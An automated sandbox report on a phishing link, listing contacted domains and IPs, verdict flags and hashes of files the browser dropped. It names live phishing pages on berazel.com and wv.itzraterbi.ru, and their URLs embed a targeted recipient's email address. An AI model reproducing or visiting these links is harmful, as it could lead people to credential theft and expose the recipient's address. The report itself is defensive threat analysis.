                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                          high
                                          https://www.google.com/recaptcha/api2/reload?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YEfalse
                                            high
                                            https://a.nel.cloudflare.com/report/v4?s=wnW%2BGYblX0Kzjphj1%2F0sP%2BY%2FLrMq%2FJuzzxlY%2FXCUapaLm0ujBdHHn0RySUC68qWD4tqzWYDFrUcvc1NMsLhZGdmyw8pFXgJqiM2S1qDotNZyr5WlboOoTG0necTOLg%3D%3Dfalse
                                              high
                                              https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==false
                                                unknown
                                                https://berazel.com/favicon.icofalse
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f48a7cc7ace41d9/1734624554141/BQm20Mq890_P8mZfalse
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f48a7cc7ace41d9&lang=autofalse
                                                      high
                                                      https://www.google.com/recaptcha/api2/payload?p=06AFcWeA4R_QY_jWM4psKCppaabuXLr6uHjmT8p8DHLe7zlxgQhMhGXlyUAf7OUlRaZD0LXikMxTybgvRbG1HsedWOw_qSDAE7Ipm-6OfTAePeERiks09k6k-s-PD_Xs_tthF-q7_DPoOyp4Zv6taXhVz6NiIW5Ma3eapxc3I0OnxkhpGvNdVsOC4hM9P9vnNScmNCX1XUa5sb&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=101b83b365ac88f4false
                                                        high
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f48a7cc7ace41d9/1734624554139/28f5dfd92c7a87d8b384f9284867ff6c9c89fbcf047d033749d17a32e7b13ad4/u-dMlLpykfFXl6lfalse
                                                          high
                                                          https://www.google.com/recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YEfalse
                                                            high
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/false
                                                              high
                                                              https://www.google.com/js/bg/Xe7AbhhPfZcEikoNmhghBXAEhOusDIBKWKS_roS4Q7E.jsfalse
                                                                high
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                                  high
                                                                  https://wv.itzraterbi.ru/xxABW/true
                                                                    unknown
                                                                    https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                                                                      high
                                                                      https://wv.itzraterbi.ru/favicon.icofalse
                                                                        unknown
                                                                        https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&co=aHR0cHM6Ly9iZXJhemVsLmNvbTo0NDM.&hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&size=normal&cb=c5wiie1kgy4zfalse
                                                                          high
                                                                          https://www.google.com/recaptcha/api.jsfalse
                                                                            high
                                                                            https://wv.itzraterbi.ru/xxABW/#Dktatroe@housingcenter.comfalse
                                                                              unknown
                                                                              https://www.google.com/recaptcha/api2/payload?p=06AFcWeA66jB7Squ_efAQ1wl69XvRCJnpngzp_HWY6p3QFWdpg9CSxF6n8e9Vd_f3cJlGjPL8O_bkiSrZ7aG8CyOoTTaO-BMrEv1mTwgfYMQg5KpsEHcwT5DN8II4CvzDez8m-ComcFHSSGm8wYXoICd6Wc3d4nwC2Jw1qKll4aNf78GGwJDKE66wVBQMV-eZZAlJBg24rXajW&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=23ea9996fd440bbffalse
                                                                                high
                                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/2106713247:1734621222:Ju1S4rINYs2w6jhaMJAc6wI0nSHHPD5uYn3o5b92WHs/8f48a7cc7ace41d9/.H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCKfalse
                                                                                  high
                                                                                  https://pbs.twimg.com/media/GY70XKXXEAA_bbZ?format=jpg&name=largefalse
                                                                                    high
                                                                                    https://berazel.com/wellness/south/config.jstrue
                                                                                      unknown
                                                                                      https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37false
                                                                                        high
                                                                                        https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YEfalse
                                                                                          high
                                                                                          https://berazel.com/wellness/south/indexfalse
                                                                                            unknown
                                                                                            https://9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru/450651641146885713188409uEDZBXeukDSKEJVJYYHNXWLRZMBRXSICETHCSJUGTTQLXNSIAORTBKCRSEOORfalse
                                                                                              unknown
                                                                                              https://www.google.com/recaptcha/api2/userverify?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YEfalse
                                                                                                high
                                                                                                https://www.google.com/recaptcha/api2/payload?p=06AFcWeA7FMEkEn3AsWDGstm5iD-gQyEvUqp0J___l-WGFyY0VXkDveTeNkvyu6jh75ui6OGd0VXh6MwnUXut8I0Rgbf4I0qHOG5EnlD5L3GT_T6b7PsVKiYN3CqXDjyZJkAW3d-Q7IZ5oIAJrq3C1DHUCmtIDFSvEUp7I_zC6sOKjpcxK7WTsgZ6uaFatqn7MORfxornuDTxQ&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=61c71c20d51b4542false
                                                                                                  high
                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                  https://www.gstatic.c..?/recaptcha/releases/nhamhfA6n_hKMa_Y7UpFyA37/recaptcha__.chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drfalse
                                                                                                    unknown
                                                                                                    https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drfalse
                                                                                                      high
                                                                                                      https://support.google.com/recaptcha#6262736chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drfalse
                                                                                                        high
                                                                                                        https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drfalse
                                                                                                          high
                                                                                                          https://support.google.com/recaptcha/?hl=en#6223828chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drfalse
                                                                                                            high
                                                                                                            https://cloud.google.com/contactchromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drfalse
                                                                                                              high
                                                                                                              https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drfalse
                                                                                                                high
                                                                                                                https://play.google.com/log?format=json&hasfast=truechromecache_107.1.drfalse
                                                                                                                  high
                                                                                                                  https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-recachromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drfalse
                                                                                                                    high
                                                                                                                    https://support.google.com/recaptcha/#6175971chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drfalse
                                                                                                                      high
                                                                                                                      https://www.google.com/recaptcha/api2/chromecache_104.1.dr, chromecache_94.1.dr, chromecache_122.1.dr, chromecache_107.1.dr, chromecache_93.1.drfalse
                                                                                                                        high
                                                                                                                        https://support.google.com/recaptchachromecache_107.1.drfalse
                                                                                                                          high
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          172.217.19.228
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          151.106.103.155
                                                                                                                          berazel.comGermany
                                                                                                                          61157PLUSSERVER-ASN1DEfalse
                                                                                                                          104.18.94.41
                                                                                                                          challenges.cloudflare.comUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          142.250.181.132
                                                                                                                          www.google.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          151.101.130.137
                                                                                                                          code.jquery.comUnited States
                                                                                                                          54113FASTLYUSfalse
                                                                                                                          52.19.163.183
                                                                                                                          go.eu.sparkpostmail1.comUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          151.101.66.137
                                                                                                                          unknownUnited States
                                                                                                                          54113FASTLYUSfalse
                                                                                                                          35.190.80.1
                                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          199.232.168.159
                                                                                                                          dualstack.twimg.twitter.map.fastly.netUnited States
                                                                                                                          54113FASTLYUSfalse
                                                                                                                          172.67.130.58
                                                                                                                          9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ruUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          172.67.163.118
                                                                                                                          wv.itzraterbi.ruUnited States
                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                          104.18.95.41
                                                                                                                          unknownUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          239.255.255.250
                                                                                                                          unknownReserved
                                                                                                                          unknownunknownfalse
                                                                                                                          13.227.8.65
                                                                                                                          d26p066pn2w0s0.cloudfront.netUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          104.17.25.14
                                                                                                                          cdnjs.cloudflare.comUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          IP
                                                                                                                          192.168.2.16
                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1578418
                                                                                                                          Start date and time:2024-12-19 17:07:16 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 4m 16s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                          Sample URL:https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:13
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal52.phis.win@25/91@53/16
                                                                                                                          EGA Information:Failed
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          • Number of executed functions: 0
                                                                                                                          • Number of non-executed functions: 0
                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.19.206, 64.233.164.84, 142.250.181.142, 172.217.17.67, 172.217.17.74, 172.217.19.10, 142.250.181.106, 142.250.181.138, 172.217.19.202, 172.217.19.234, 172.217.21.42, 172.217.17.42, 216.58.208.234, 142.250.181.74, 142.250.181.67, 172.217.17.35, 23.218.208.109, 20.109.210.53
                                                                                                                          • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, www.gstatic.com
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • VT rate limit hit for: https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==
                                                                                                                          No simulations
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:07:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2673
                                                                                                                          Entropy (8bit):3.9922955932814337
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8Vd3Tvj2HXidAKZdA1FehwiZUklqehqy+3:8v3Kpy
                                                                                                                          MD5:94CC4C97F2B6EA5CE9F14F355B5881D8
                                                                                                                          SHA1:92CFD3F2E4CFBE9AD9D370ADA1FA3C77D8EFEF36
                                                                                                                          SHA-256:73A02163F4D7534CE9FA8618FF1B0FD5CD17C1210828D926C470E47C68B71D8F
                                                                                                                          SHA-512:DF38D028A0566A5B461B2B1939A4256037CE20EAF15EA4D887EA430115B2755AC39E3FEC299C2DA8B3866AD6CDC26277ADB383DDF0D1CFEB85A19889719D0762
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:L..................F.@.. ...$+.,.......&0R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:07:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2675
                                                                                                                          Entropy (8bit):4.00480560636352
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8Hed3Tvj2HXidAKZdA1seh/iZUkAQkqehZy+2:8H63k9QQy
                                                                                                                          MD5:CB3C00C7E709F289835D713021B7FF98
                                                                                                                          SHA1:2D38DD43ED3061660824CF9E6F8E29B305DE4B91
                                                                                                                          SHA-256:1611456E1BB137D6E6C2E33AC29233FAD46BAAB49E18177FA7393E8A5798D2B1
                                                                                                                          SHA-512:59E3CC163C6266ADC7550FE80E562CB768CAD8EA4788A53E52223AE17361754D454C1EFAEB77E0AAE9067A289F240B730D8501D37EE327DDEA37A054CA574E96
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:L..................F.@.. ...$+.,....cV.&0R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2689
                                                                                                                          Entropy (8bit):4.013644983993789
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8Cd3TvjAHXidAKZdA14meh7sFiZUkmgqeh7sny+BX:8O3mn1y
                                                                                                                          MD5:B31D85F767B6DBBD64C8B820808B9D9F
                                                                                                                          SHA1:BC4B9D1F71F6BE9C94EEDCC5A0E67204EA47DB2F
                                                                                                                          SHA-256:60F400357E5B1B5778F1802914B0873E3005D309335DE0FCE1D815A16A2D4392
                                                                                                                          SHA-512:6CA25CBDDA58D373222E1784B339DFB2F76EFC8E1A29F85F39315C0174418FC86F80BB1D360681A62C01C99062B912B5293EDA71D764A28F20CF199294EF9442
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:07:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2677
                                                                                                                          Entropy (8bit):4.006213105142925
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8D0d3Tvj2HXidAKZdA1TehDiZUkwqehNy+R:8A3//y
                                                                                                                          MD5:00F6943BF72F0BD2D1221F123C8DF56E
                                                                                                                          SHA1:DF58CFD639E10050F57A309423F0F7D196C34352
                                                                                                                          SHA-256:25BB2307880512901A61C706AA0EF8C3A33BB1581B03FA4B531965F9242AB960
                                                                                                                          SHA-512:0E84FABD024B6FA116DDBE4308A011D1B3590612B07084C0F84172E13D80AEF25FB09F71A7156929ED4C25BF5C40090C13B14B62B20A223BB01783A738FDD9C2
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:L..................F.@.. ...$+.,.......&0R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:07:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2677
                                                                                                                          Entropy (8bit):3.9942572557412643
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8ud3Tvj2HXidAKZdA1dehBiZUk1W1qehDy+C:8q3f9jy
                                                                                                                          MD5:73F73BC6206F6030FC7327C2BB9E52BC
                                                                                                                          SHA1:BC6BAB34C459D6FFBE437B3C39C025850803A89B
                                                                                                                          SHA-256:248377D05DFE3D78EDCCCE690051639D2885CBB60D9EC06D58567C91CC07E148
                                                                                                                          SHA-512:FFCF03E07F439DFA1DFC3A8A525FCE0F69DD66E5F39435A47E07F3C6A255E1236A5245543AF718D7E14C9507A19040C039E4970BF0DCB4CBC121203305A014DA
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:L..................F.@.. ...$+.,.......&0R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:07:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2679
                                                                                                                          Entropy (8bit):4.001480157986765
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8Cd3Tvj2HXidAKZdA1duTeehOuTbbiZUk5OjqehOuTb1y+yT+:8O3jTfTbxWOvTb1y7T
                                                                                                                          MD5:48639EE3493086C11499742FE4343763
                                                                                                                          SHA1:0699E281781C044A69D99EF97FC0CC031B8AD9DB
                                                                                                                          SHA-256:0A78DAA20DF2C0A32DB8BB3F3252CFEEFA76C13C293C331B021F15AD946B74DE
                                                                                                                          SHA-512:E0B65F2A9DDE7E04DDE9D34D6EC2A6E8F3B3E81C9DC97543404B87ABC9D12ED06FD619C80D95E9501A3DC542348012EC0D315AFCDD7D50960002EAC4511B2CE3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:L..................F.@.. ...$+.,.....Y.&0R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15340, version 1.0
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):15340
                                                                                                                          Entropy (8bit):7.983406336508752
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:F2gPJde0V2iGrQyD8b3k/tigCdeNqOUd47SH0tsGm:4gPVV2NQE8b3ldeNWH0Wb
                                                                                                                          MD5:19B7A0ADFDD4F808B53AF7E2CE2AD4E5
                                                                                                                          SHA1:81D5D4C7B5035AD10CCE63CF7100295E0C51FDDA
                                                                                                                          SHA-256:C912A9CE0C3122D4B2B29AD26BFE06B0390D1A5BDAA5D6128692C0BEFD1DFBBD
                                                                                                                          SHA-512:49DA16000687AC81FC4CA9E9112BDCA850BB9F32E0AF2FE751ABC57A8E9C3382451B50998CEB9DE56FC4196F1DC7EF46BBA47933FC47EB4538124870B7630036
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc4.woff2
